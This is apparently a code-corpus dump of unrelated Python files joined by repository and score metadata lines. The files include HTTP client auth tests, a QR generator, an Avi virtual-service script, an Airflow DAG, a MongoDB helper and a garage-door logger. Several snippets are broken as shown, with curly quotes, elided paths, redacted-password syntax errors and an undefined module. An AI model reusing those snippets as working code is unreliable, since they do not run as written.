mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
def test_get_endpoint_url(self):
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
mox.StrContains(AUTH_URL + '/tokens/%s/endpoints' % TOKEN), 'GET',
headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(ENDPOINTS_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
def test_use_given_endpoint_url(self):
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION,
endpoint_url=ENDPOINT_OVERRIDE)
self.assertEqual(self.client.endpoint_url, ENDPOINT_OVERRIDE)
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
mox.StrContains(ENDPOINT_OVERRIDE + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
self.assertEqual(self.client.endpoint_url, ENDPOINT_OVERRIDE)
def test_get_endpoint_url_other(self):
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='otherURL')
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
self.client.request(
mox.StrContains(AUTH_URL + '/tokens/%s/endpoints' % TOKEN), 'GET',
headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(ENDPOINTS_RESULT)))
self.mox.ReplayAll()
self.assertRaises(exceptions.EndpointTypeNotFound,
self.client.do_request,
'/resource',
'GET')
def test_get_endpoint_url_failed(self):
self.mox.StubOutWithMock(self.client, "request")
self.client.auth_token = TOKEN
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
res401 = self.mox.CreateMock(httplib2.Response)
res401.status = 401
self.client.request(
mox.StrContains(AUTH_URL + '/tokens/%s/endpoints' % TOKEN), 'GET',
headers=mox.IsA(dict)
).AndReturn((res401, ''))
self.client.request(
AUTH_URL + '/tokens', 'POST',
body=mox.IsA(str), headers=mox.IsA(dict)
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
self.client.request(
mox.StrContains(ENDPOINT_URL + '/resource'), 'GET',
headers=mox.ContainsKeyValue('X-Auth-Token', TOKEN)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
def test_url_for(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
endpoints['publicURL'] = 'public'
endpoints['internalURL'] = 'internal'
endpoints['adminURL'] = 'admin'
catalog = client.ServiceCatalog(resources)
# endpoint_type not specified
url = catalog.url_for(attr='region',
filter_value=REGION)
self.assertEqual('public', url)
# endpoint type specified (3 cases)
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='adminURL')
self.assertEqual('admin', url)
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='publicURL')
self.assertEqual('public', url)
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='internalURL')
self.assertEqual('internal', url)
# endpoint_type requested does not exist.
self.assertRaises(exceptions.EndpointTypeNotFound,
catalog.url_for,
attr='region',
filter_value=REGION,
endpoint_type='privateURL')
# Test scenario with url_for when the service catalog only has publicURL.
def test_url_for_only_public_url(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
catalog = client.ServiceCatalog(resources)
# Remove endpoints from the catalog.
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
del endpoints['internalURL']
del endpoints['adminURL']
endpoints['publicURL'] = 'public'
# Use publicURL when specified explicitly.
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='publicURL')
self.assertEqual('public', url)
# Use publicURL when specified explicitly.
url = catalog.url_for(attr='region',
filter_value=REGION)
self.assertEqual('public', url)
# Test scenario with url_for when the service catalog only has adminURL.
def test_url_for_only_admin_url(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
catalog = client.ServiceCatalog(resources)
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
del endpoints['internalURL']
del endpoints['publicURL']
endpoints['adminURL'] = 'admin'
# Use publicURL when specified explicitly.
url = catalog.url_for(attr='region',
filter_value=REGION,
endpoint_type='adminURL')
self.assertEqual('admin', url)
# But not when nothing is specified.
self.assertRaises(exceptions.EndpointTypeNotFound,
catalog.url_for,
attr='region',
filter_value=REGION)
def test_endpoint_type(self):
resources = copy.deepcopy(KS_TOKEN_RESULT)
endpoints = resources['access']['serviceCatalog'][0]['endpoints'][0]
endpoints['internalURL'] = 'internal'
endpoints['adminURL'] = 'admin'
endpoints['publicURL'] = 'public'
# Test default behavior is to choose public.
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION)
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'public')
# Test admin url
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='adminURL')
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'admin')
# Test public url
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='publicURL')
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'public')
# Test internal url
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='internalURL')
self.client._extract_service_catalog(resources)
self.assertEqual(self.client.endpoint_url, 'internal')
# Test url that isn't found in the service catalog
self.client = client.HTTPClient(
username=USERNAME, tenant_name=TENANT_NAME, password=PASSWORD,
auth_url=AUTH_URL, region_name=REGION, endpoint_type='privateURL')
self.assertRaises(exceptions.EndpointTypeNotFound,
self.client._extract_service_catalog,
resources)
def test_strip_credentials_from_log(self):
def verify_no_credentials(kwargs):
return ('REDACTED' in kwargs['body']) and (
self.client.password not in kwargs['body'])
def verify_credentials(body):
return 'REDACTED' not in body and self.client.password in body
self.mox.StubOutWithMock(self.client, "request")
self.mox.StubOutWithMock(utils, "http_log_req")
res200 = self.mox.CreateMock(httplib2.Response)
res200.status = 200
utils.http_log_req(mox.IgnoreArg(), mox.IgnoreArg(), mox.Func(
verify_no_credentials))
self.client.request(
mox.IsA(str), mox.IsA(str), body=mox.Func(verify_credentials),
headers=mox.IgnoreArg()
).AndReturn((res200, json.dumps(KS_TOKEN_RESULT)))
utils.http_log_req(mox.IgnoreArg(), mox.IgnoreArg(), mox.IgnoreArg())
self.client.request(
mox.IsA(str), mox.IsA(str), headers=mox.IsA(dict)
).AndReturn((res200, ''))
self.mox.ReplayAll()
self.client.do_request('/resource', 'GET')
class CLITestAuthKeystoneWithId(CLITestAuthKeystone):
# Auth Body expected when using tenant Id
auth_type = 'tenantId'
def setUp(self):
"""Prepare the test environment."""
super(CLITestAuthKeystoneWithId, self).setUp()
self.client = client.HTTPClient(username=USERNAME,
tenant_id=TENANT_ID,
password=PASSWORD,
auth_url=AUTH_URL,
region_name=REGION)
class CLITestAuthKeystoneWithIdandName(CLITestAuthKeystone):
# Auth Body expected when using tenant Id
auth_type = 'tenantId'
def setUp(self):
"""Prepare the test environment."""
super(CLITestAuthKeystoneWithIdandName, self).setUp()
self.client = client.HTTPClient(username=USERNAME,
tenant_id=TENANT_ID,
tenant_name=TENANT_NAME,
password=PASSWORD,
auth_url=AUTH_URL,
region_name=REGION)
| 1.421875 | 1 |
api/scripts/test/test_generate_promoter_terminator.py | IsaacLuo/webexe | 0 | 35972 | import subprocess
import pytest
import os
import json
def test_call_generate_promoter_terminator():
print('')
process_result = subprocess.run(['python', 'generate_promoter_terminator.py', './test/1.gff.json', '500', '200'], \
capture_output=True)
assert process_result.returncode == 0
result_line = process_result.stdout.decode().splitlines()[-1]
result_obj = json.loads(result_line)
assert result_obj['type'] == 'result'
file_url = result_obj['data']['files'][0]['url']
assert file_url
with open(os.path.join('test', '1.gff.json')) as fp:
src_gff = json.load(fp)
with open(os.path.join('results', file_url)) as fp:
dst_gff = json.load(fp)
assert len(dst_gff['records']) > len(src_gff['records'])
#all sequence must have hash
for record in dst_gff['records']:
assert 'sequenceHash' in record
assert record['sequenceHash'] == tools.get_sequence_hash(dst_gff, record['chrName'], record['start'], record['end'], record['strand'])
os.remove(os.path.join('results', file_url))
| 1.3125 | 1 |
main.py | NawrasseDahman/Qr-Code-Generator | 1 | 36100 | import qrcode
# data example
data = "www.google.com"
# file name
file_name = "qrcode.png"
# generate qr code
img = qrcode.make(data=data)
# save generated qr code as img
img.save(file_name)
| 1.421875 | 1 |
config.py | outbreakdm/Dead-Matter-Discord-Bot-Player-Counter | 0 | 36228 | BOT_TOKEN = "<PASSWORD>"
SERVER_ADDRESS = ("192.168.3.11:7797", 27016)
| 0.07959 | 0 |
corehq/ex-submodules/casexml/apps/stock/tests/mock_consumption.py | akashkj/commcare-hq | 471 | 36356 | <gh_stars>100-1000
from datetime import datetime, timedelta
from dimagi.utils import parsing as dateparse
from casexml.apps.stock.consumption import (
ConsumptionConfiguration,
compute_daily_consumption_from_transactions,
)
to_ts = dateparse.json_format_datetime
now = datetime.utcnow()
def ago(days):
return now - timedelta(days=days)
# note that you must add inferred consumption transactions manually to txdata
def mock_consumption(txdata, window, params=None):
default_params = {'min_window': 0, 'min_periods': 0}
params = params or {}
default_params.update(params)
config = ConsumptionConfiguration(**default_params)
return compute_daily_consumption_from_transactions(
txdata,
ago(window),
config,
)
| 1.054688 | 1 |
VS State and Virtual IP Info/avi_virtual_service_info.py | jagmeetsingh91/AviSDK-Scripts | 0 | 36484 | <filename>VS State and Virtual IP Info/avi_virtual_service_info.py
#!/usr/bin/env python
#
# Created on Nov 14, 2017
# @author: <EMAIL>, <EMAIL>
#
# AVISDK based Script to get the status and configuration information of the Virtual Services
#
# Requires AVISDK ("pip install avisdk") and PrettyTable ("pip install PrettyTable")
# Usage:- python avi_virtual_service_info.py -c <Controller-IP> -u <user-name> -p <password>
# Note:- This script works for Avi Controler version 17.1.1 onwards
import json
import argparse
from avi.sdk.avi_api import ApiSession
from requests.packages import urllib3
from prettytable import PrettyTable
from prettytable import ALL as ALL
urllib3.disable_warnings()
def get_vs_list(api, api_version):
vs_list = []
rsp = api.get('virtualservice', api_version=api_version)
for vs in rsp.json()['results']:
vs_list.append(vs['uuid'])
return vs_list
def get_vs_oper_info(api, api_version, vs_list):
oper_dict = {}
for vs in vs_list:
rsp = api.get('virtualservice-inventory/%s' % vs, api_version=api_version)
vs_data = rsp.json()
req_vs_data = { "state": vs_data['runtime']['oper_status']['state'], "name": vs_data['config']['name'],
"uuid": vs_data['config']['uuid'] }
i = 1
for vips in vs_data['config']['vip']:
req_vs_data["vip_"+str(i)] = vips
i = i+1
j = 1
for dns in vs_data['config']['dns_info']:
req_vs_data["dns_"+str(j)] = dns
j = j+1
if vs_data['runtime']['oper_status']['state'] in oper_dict.keys():
oper_dict[vs_data['runtime']['oper_status']['state']].append(req_vs_data)
else:
oper_dict[vs_data['runtime']['oper_status']['state']] = []
oper_dict[vs_data['runtime']['oper_status']['state']].append(req_vs_data)
return oper_dict
def main():
#Getting Required Args
parser = argparse.ArgumentParser(description="AVISDK based Script to get the status and configuration"+
" information of the Virtual Services")
parser.add_argument("-u", "--username", required=True, help="Login username")
parser.add_argument("-p", "--password", required=True, help="Login password")
parser.add_argument("-c", "--controller", required=True, help="Controller IP address")
parser.add_argument("-t", "--tenant", required=False, help="Tenant Name")
parser.add_argument("-a", "--api_version", required=False, help="Tenant Name")
args = parser.parse_args()
user = args.username
host = args.controller
password = <PASSWORD>
if args.tenant:
tenant=args.tenant
else:
tenant="*"
if args.api_version:
api_version=args.api_version
else:
api_version="17.1.1"
#Getting API session for the intended Controller.
api = ApiSession.get_session(host, user, password, tenant=tenant, api_version=api_version)
#Getting the list of VirtualService(s).
vs_list = get_vs_list(api, api_version)
#Getting VS information
oper_dict = get_vs_oper_info(api, api_version, vs_list)
#print "Final Oper Dict:" + str(oper_dict)
for state, vs in oper_dict.iteritems():
print("VS in State:%s [%s]" % (state, len(vs)))
table = PrettyTable(hrules=ALL)
table.field_names = ["VS Name","VIP_ID", "VIP_Address", "DNS_INFO"]
for vss in vs:
vips = list()
dns_info = list()
vip_count = 0
dns_count = 0
if 'vip_1' in vss.keys():
vips = [value for key, value in vss.iteritems() if 'vip' in key.lower()]
vip_count = len(vips)
if 'dns_1' in vss.keys():
dns_info = [value for key, value in vss.iteritems() if 'dns' in key.lower()]
dns_count = len(dns_info)
vs_name = vss['name']
vip_ids = ''
vips_list = ''
dns_list = ''
for vip in vips:
vip_ids += vip['vip_id'] + "\n"
vips_list += vip['ip_address']['addr']
if vip.get('floating_ip', None):
vips_list += '- ' + vip['floating_ip']['addr']
vips_list+='\n'
for dns in dns_info:
dns_list += dns['fqdn'] + "\n"
table.add_row([vs_name, vip_ids[:-1], vips_list[:-1], dns_list[:-1]])
print table
print "\n"
if __name__ == "__main__":
main()
| 1.398438 | 1 |
5 kyu/Memoized Fibonacci.py | mwk0408/codewars_solutions | 6 | 36612 | def fibonacci(n, res=[0,1]):
if len(res)<=n:
res.append(fibonacci(n-1)+fibonacci(n-2))
return res[n] | 2.28125 | 2 |
plantcv/plantcv/hist_equalization.py | Howzit123/plantcv | 2 | 36740 | <filename>plantcv/plantcv/hist_equalization.py
# Histogram equalization
import cv2
import numpy as np
import os
from plantcv.plantcv import print_image
from plantcv.plantcv import plot_image
from plantcv.plantcv import fatal_error
from plantcv.plantcv import params
def hist_equalization(gray_img):
"""Histogram equalization is a method to normalize the distribution of intensity values. If the image has low
contrast it will make it easier to threshold.
Inputs:
gray_img = Grayscale image data
Returns:
img_eh = normalized image
:param gray_img: numpy.ndarray
:return img_eh: numpy.ndarray
"""
if len(np.shape(gray_img)) == 3:
fatal_error("Input image must be gray")
img_eh = cv2.equalizeHist(gray_img)
params.device += 1
if params.debug == 'print':
print_image(img_eh, os.path.join(params.debug_outdir, str(params.device) + '_hist_equal_img.png'))
elif params.debug == 'plot':
plot_image(img_eh, cmap='gray')
return img_eh
| 2.5625 | 3 |
lukkari/timerange.py | JuEeHa/lukkari | 0 | 36868 | import datetime
class Timerange:
def __init__(self, start, length):
self.start = start
self.length = length
def range(self):
end = self.start + self.length
return (self.start, end)
def __contains__(self, day):
delta = day - self.start
return datetime.timedelta(seconds = 0) <= delta and delta < self.length
def overlaps(self, other):
if other.start < self.start:
return other.overlaps(self)
assert(self.start <= other.start)
return other.start < self.start + self.length
def __repr__(self):
return 'Timerange(%s, %s)' % (repr(self.start), repr(self.length))
def __str__(self):
start, end = (i.strftime('%H:%M') for i in self.range())
return '%s - %s' % (start, end)
def __eq__(self, other):
return self.start == other.start and self.length == other.length
def __ne__(self, other):
return not self == other
def between(start, end):
assert(len(start) == 2 and len(end) == 2)
start_hour, start_minute = start
end_hour, end_minute = end
start_obj = datetime.datetime(1970, 1, 1, start_hour, start_minute)
end_obj = datetime.datetime(1970, 1, 1, end_hour, end_minute)
assert(end_obj - start_obj > datetime.timedelta(seconds = 0))
return Timerange(start_obj, end_obj - start_obj)
| 2.59375 | 3 |
fst_lookup/fallback_data.py | eddieantonio/fst-lookup | 5 | 36996 | <gh_stars>1-10
"""
Fallback data types, implemented in Python, for platforms that cannot build
the C extension.
"""
from .symbol import Symbol
from .typedefs import StateID
class Arc:
"""
An arc (transition) in the FST.
"""
__slots__ = ("_state", "_upper", "_lower", "_destination")
def __init__(
self, state: StateID, upper: Symbol, lower: Symbol, destination: StateID
) -> None:
self._state = state
self._upper = upper
self._lower = lower
self._destination = destination
@property
def state(self) -> int:
return self._state
@property
def upper(self) -> Symbol:
return self._upper
@property
def lower(self) -> Symbol:
return self._lower
@property
def destination(self) -> int:
return self._destination
def __eq__(self, other) -> bool:
if not isinstance(other, Arc):
return False
return (
self._state == other._state
and self._upper == other._upper
and self._lower == other._lower
and self._destination == other._destination
)
def __hash__(self) -> int:
return self._state + (hash(self._upper) ^ hash(self._lower))
def __str__(self) -> str:
if self._upper == self._lower:
label = str(self._upper)
else:
label = str(self._upper) + ":" + str(self._lower)
return "{:d} -{:s}-> {:d}".format(self._state, label, self._destination)
| 2.203125 | 2 |
singletons/mail.py | kwestpharedhat/quay | 0 | 37124 | from flask_mail import Mail
from singletons.app import _app
mail = Mail(_app)
| 0.59375 | 1 |
octostore/mongo_helper.py | luzhang06/octostore | 1 | 37252 | <gh_stars>1-10
from pymongo import MongoClient
import os
import sys
from pathlib import Path
from environs import Env
sys.path.append("..")
sys.path.append(str(Path(__file__).parent.resolve()))
class MongoHelpers:
_client = None
_db = None
_collection = None
def __init__(self, connection_uri=None, db_name=None):
env = Env()
env.read_env()
if db_name is None:
db_name = os.getenv("MONGO_DB")
if connection_uri is None:
host = os.getenv("MONGO_HOST")
port = os.getenv("MONGO_PORT")
username = os.getenv("MONGO_USERNAME")
password = <PASSWORD>("<PASSWORD>")
args = "ssl=true&retrywrites=false&ssl_cert_reqs=CERT_NONE"
connection_uri = (
f"mongodb://{username}:{password}@{host}:{port}/{db_name}?{args}"
)
self.client = MongoClient(connection_uri)
self.db = self._client[db_name]
# def create_experiment(self, name, artifact_location=None, tags=[]):
# # all_experiments = self.get_all_experiments()
# # Get all existing experiments and find the one with largest numerical ID.
# # len(list_all(..)) would not work when experiments are deleted.
# # experiments_ids = [
# # int(e.experiment_id)
# # for e in self.list_experiments(ViewType.ALL)
# # if e.experiment_id.isdigit()
# # ]
# experiment_id = self._get_highest_experiment_id() + 1
# return self._create_experiment_with_id(
# name, str(experiment_id), artifact_location, tags
# )
# def _create_experiment_with_id(
# self,
# experiment_name,
# experiment_id,
# artifact_location,
# lifecycle_stage: LifecycleStage = LifecycleStage.ACTIVE,
# tags=[],
# ) -> int:
# e = Experiment(
# experiment_id,
# experiment_name,
# experiment_id,
# artifact_location,
# lifecycle_stage,
# tags,
# )
# def _get_highest_experiment_id(self):
# if len(list(self._client.experiments.find())) is not 0:
# last_experiment = list(
# self.db.experiments.find({}).sort("experiment_id", -1).limit(1)
# )
# return last_experiment[0]["experiment_id"]
# else:
# return 0
# def list_experiments(self, view_type=ViewType.ACTIVE_ONLY):
# rsl = []
# if view_type == ViewType.ACTIVE_ONLY or view_type == ViewType.ALL:
# rsl += self._get_active_experiments(full_path=False)
# if view_type == ViewType.DELETED_ONLY or view_type == ViewType.ALL:
# # rsl += self._get_deleted_experiments(full_path=False)
# pass
# experiments = []
# for exp_id in rsl:
# try:
# # trap and warn known issues, will raise unexpected exceptions to caller
# experiment = self._get_experiment(exp_id, view_type)
# if experiment:
# experiments.append(experiment)
# except MissingConfigException as rnfe:
# # Trap malformed experiments and log warnings.
# logging.warning(
# "Malformed experiment '%s'. Detailed error %s",
# str(exp_id),
# str(rnfe),
# exc_info=True,
# )
# return experiments
# def _get_active_experiments(self, full_path=False):
# active_experiments_query = {
# "type": "experiment",
# "experiment_state": LifecycleStage.ACTIVE,
# }
# all_experiments = self.db.experiments.find(active_experiments_query)
# # exp_list = list_subdirs(self.root_directory, full_path)
# # return [exp for exp in exp_list if not exp.endswith(FileStore.TRASH_FOLDER_NAME)]
# def _get_deleted_experiments(self, full_path=False):
# # return list_subdirs(self.trash_folder, full_path)
# raise NotImplementedError("get_deleted_experiments")
| 2.328125 | 2 |
Chapter05/airflow/dags/classification_pipeline_dag.py | arifmudi/Machine-Learning-Engineering-with-Python | 67 | 37380 | <reponame>arifmudi/Machine-Learning-Engineering-with-Python
from datetime import timedelta
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.utils.dates import days_ago
default_args = {
'owner': '<NAME>',
'depends_on_past': False,
'start_date': days_ago(2),
'email': ['<EMAIL>'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=2),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
# 'wait_for_downstream': False,
# 'dag': dag,
# 'sla': timedelta(hours=2),
# 'execution_timeout': timedelta(seconds=300),
# 'on_failure_callback': some_function,
# 'on_success_callback': some_other_function,
# 'on_retry_callback': another_function,
# 'sla_miss_callback': yet_another_function,
# 'trigger_rule': 'all_success'
}
#instantiate DAG
dag = DAG(
'classification_pipeline',
default_args=default_args,
description=’Basic pipeline for classifying the Wine Dataset',
schedule_interval=timedelta(days=1), # run daily? check
)
get_data = BashOperator(
task_id='get_data',
bash_command='python3 /usr/local/airflow/scripts/get_data.py',
dag=dag,
)
train_model= BashOperator(
task_id='train_model',
depends_on_past=False,
bash_command='python3 /usr/local/airflow/scripts/train_model.py',
retries=3,
dag=dag,
)
# Persist to MLFlow
persist_model = BashOperator(
task_id='persist_model',
depends_on_past=False,
bash_command=’python ……./persist_model.py,
retries=3,
dag=dag,
)
get_data >> train_model >> persist_model
| 1.523438 | 2 |
oro_plugins/migrations/0002_galleryitem_gallery.py | mikeh74/orocus_djangocms | 0 | 37508 | <gh_stars>0
# Generated by Django 3.0.6 on 2020-06-05 20:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oro_plugins', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='galleryitem',
name='gallery',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='oro_plugins.Gallery', verbose_name=''),
preserve_default=False,
),
]
| 0.894531 | 1 |
common/db.py | levinster82/GaragePi | 34 | 37636 | import os
from sqlite3 import dbapi2 as sqlite3
class GarageDb:
def __init__(self, instance_path, resource_path):
self.db_file = os.path.join(instance_path, 'history.db')
self.init_file = os.path.join(resource_path, 'schema.sql')
# Run init script to ensure database structure
conn = self.get_connection()
with open(self.init_file, mode='r') as f:
conn.cursor().executescript(f.read())
conn.commit()
conn.close()
def get_connection(self):
rv = sqlite3.connect(self.db_file)
rv.row_factory = sqlite3.Row
return rv
def record_event(self, user_agent: str, login: str, event: str, description: str):
conn = self.get_connection()
conn.execute('insert into entries (UserAgent, Login, Event, Description) values (?, ?, ?, ?)',
[user_agent, login, event, description])
conn.commit()
conn.close()
def read_history(self):
conn = self.get_connection()
cur = conn.execute('select datetime(timestamp, \'localtime\') as timestamp, event, description from entries order by timestamp desc')
records = cur.fetchmany(500)
conn.close()
return records
def read_full_history(self):
conn = self.get_connection()
cur = conn.execute('select datetime(timestamp, \'localtime\') as timestamp, event, description from entries order by timestamp desc')
records = cur.fetchall()
conn.close()
return records
| 1.859375 | 2 |
bot/migrators/config_migrator.py | yukie-nobuharu/TTMediaBot | 0 | 37764 | <filename>bot/migrators/config_migrator.py
import sys
from bot.config import ConfigManager, config_data_type
def to_v1(config_data: config_data_type) -> config_data_type:
return update_version(config_data, 1)
migrate_functs = {1: to_v1}
def migrate(
config_manager: ConfigManager,
config_data: config_data_type,
) -> config_data_type:
if "config_version" not in config_data:
update_version(config_data, 0)
elif (
not isinstance(config_data["config_version"], int)
or config_data["config_version"] > config_manager.version
):
sys.exit("Error: invalid config_version value")
elif config_data["config_version"] == config_manager.version:
return config_data
else:
for ver in migrate_functs:
if ver > config_data["config_version"]:
config_data = migrate_functs[ver](config_data)
config_manager._dump(config_data)
return config_data
def update_version(config_data: config_data_type, version: int) -> config_data_type:
_config_data = {"config_version": version}
_config_data.update(config_data)
return _config_data
| 1.5 | 2 |
Fundamentos/variables.py | ijchavez/python | 0 | 37892 | <filename>Fundamentos/variables.py
x = 5
y = 3
z = x + y
print(x)
print(y)
print(x + y)
print(z)
w = z
print(w) | 0.714844 | 1 |
scripts/distribution.py | Qi-max/amlearn | 12 | 38020 | <reponame>Qi-max/amlearn
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
__author__ = "<NAME>"
__email__ = "<EMAIL>"
def column_hist(data, bins=None, density=True, fraction=True,
save_figure_to_dir=None, save_data_to_dir=None, fmt=None,
ylim=None, yscale=None):
bins = 20 if bins is None else bins
fmt = '%.10e' if fmt is None else fmt
hist, edge = np.histogram(data, bins=bins, density=density)
if density is False:
if fraction:
hist = hist/hist.sum()
if save_figure_to_dir:
plt.figure(figsize=(6, 6))
# alpha gives transparency
plt.plot(edge[1:], hist, 'r--o', alpha=0.5, linewidth=1.0)
if ylim:
plt.ylim(*ylim)
if yscale:
plt.yscale(yscale)
plt.savefig(save_figure_to_dir, dpi=100, bbox_inches='tight')
plt.close()
if save_data_to_dir:
np.savetxt(save_data_to_dir, list(zip(edge[1:], hist)), fmt=fmt)
if __name__ == "__main__":
system = ["Cu65Zr35", "qr_5plus10^10"]
prediction_file = "xx"
output_path = "xxx"
output_file_header = r'{}_{}_QS'.format(*system)
qs_col = "QS_predict"
bin = 0.02
df = pd.read_csv(prediction_file, index_col=0)
column_hist(df[qs_col], bins=np.arange(0, 1.0, bin), density=True,
save_figure_to_dir=os.path.join(output_path, "{}_density_bin_{}.png".format(output_file_header, bin)),
save_data_to_dir=os.path.join(output_path, "{}_density_bin_{}.csv".format(output_file_header, bin)),
fmt=["%.2f", '%.10e'])
column_hist(df[qs_col], bins=np.arange(0, 1.0, bin), density=False,
save_figure_to_dir=os.path.join(output_path, "{}_fraction_bin_{}.png".format(output_file_header, bin)),
save_data_to_dir=os.path.join(output_path, "{}_fraction_bin_{}.csv".format(output_file_header, bin)),
ylim=(0, 0.05),
fmt=["%.2f", '%.10e'])
column_hist(df[qs_col], bins=np.arange(0, 1.0, bin), density=False,
save_figure_to_dir=os.path.join(output_path, "{}_fraction_bin_{}_log.png".format(output_file_header, bin)),
save_data_to_dir=os.path.join(output_path, "{}_fraction_bin_{}_log.csv".format(output_file_header, bin)),
ylim=(0.0001, 0.05), yscale="log",
fmt=["%.2f", '%.10e'])
| 2.265625 | 2 |
tests/test_dataset_manager.py | METASPACE2020/sm-engine | 3 | 38148 | from unittest.mock import patch, MagicMock, call
import json
from datetime import datetime
from copy import deepcopy
import pytest
from PIL import Image
from sm.engine import DB, ESExporter, QueuePublisher
from sm.engine.dataset_manager import SMapiDatasetManager, SMDaemonDatasetManager
from sm.engine.dataset_manager import Dataset, DatasetActionPriority, DatasetAction, DatasetStatus
from sm.engine.errors import DSIDExists
from sm.engine.queue import SM_ANNOTATE, SM_DS_STATUS
from sm.engine.tests.util import pysparkling_context, sm_config, ds_config, test_db
from sm.engine.png_generator import ImageStoreServiceWrapper
@pytest.fixture()
def fill_db(test_db, sm_config, ds_config):
upload_dt = '2000-01-01 00:00:00'
ds_id = '2000-01-01'
meta = {"meta": "data"}
db = DB(sm_config['db'])
db.insert('INSERT INTO dataset (id, name, input_path, upload_dt, metadata, config, '
'status, is_public, mol_dbs, adducts) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)',
rows=[(ds_id, 'ds_name', 'input_path', upload_dt,
json.dumps(meta), json.dumps(ds_config), DatasetStatus.FINISHED,
True, ['HMDB-v4'], ['+H'])])
db.insert("INSERT INTO job (id, db_id, ds_id) VALUES (%s, %s, %s)",
rows=[(0, 0, ds_id)])
db.insert("INSERT INTO sum_formula (id, db_id, sf) VALUES (%s, %s, %s)",
rows=[(1, 0, 'H2O')])
db.insert(("INSERT INTO iso_image_metrics (job_id, db_id, sf, adduct, iso_image_ids) "
"VALUES (%s, %s, %s, %s, %s)"),
rows=[(0, 0, 'H2O', '+H', ['iso_image_1_id', 'iso_image_2_id'])])
db.close()
def create_ds_man(sm_config, db=None, es=None, img_store=None,
action_queue=None, status_queue=None, sm_api=False):
db = db or DB(sm_config['db'])
es_mock = es or MagicMock(spec=ESExporter)
action_queue_mock = action_queue or MagicMock(QueuePublisher)
status_queue_mock = status_queue or MagicMock(QueuePublisher)
img_store_mock = img_store or MagicMock(spec=ImageStoreServiceWrapper)
if sm_api:
return SMapiDatasetManager(db=db, es=es_mock,
mode='queue', image_store=img_store_mock,
action_queue=action_queue_mock, status_queue=status_queue_mock)
else:
return SMDaemonDatasetManager(db=db, es=es_mock,
img_store=img_store_mock, mode=None,
status_queue=status_queue_mock)
def create_ds(ds_id='2000-01-01', ds_name='ds_name', input_path='input_path', upload_dt=None,
metadata=None, ds_config=None, status=DatasetStatus.NEW, mol_dbs=None, adducts=None):
upload_dt = upload_dt or datetime.now()
if not mol_dbs:
mol_dbs = ['HMDB-v4']
if not adducts:
adducts = ['+H', '+Na', '+K']
return Dataset(ds_id, ds_name, input_path, upload_dt, metadata or {}, ds_config or {},
status=status, mol_dbs=mol_dbs, adducts=adducts, img_storage_type='fs')
class TestSMapiDatasetManager:
def test_add_new_ds(self, test_db, sm_config, ds_config):
action_queue_mock = MagicMock(spec=QueuePublisher)
ds_man = create_ds_man(sm_config, action_queue=action_queue_mock, sm_api=True)
ds_id = '2000-01-01'
ds = create_ds(ds_id=ds_id, ds_config=ds_config)
ds_man.add(ds, priority=DatasetActionPriority.HIGH)
msg = {'ds_id': ds_id, 'ds_name': 'ds_name', 'input_path': 'input_path',
'action': DatasetAction.ADD, 'del_first': False}
action_queue_mock.publish.assert_has_calls([call(msg, DatasetActionPriority.HIGH)])
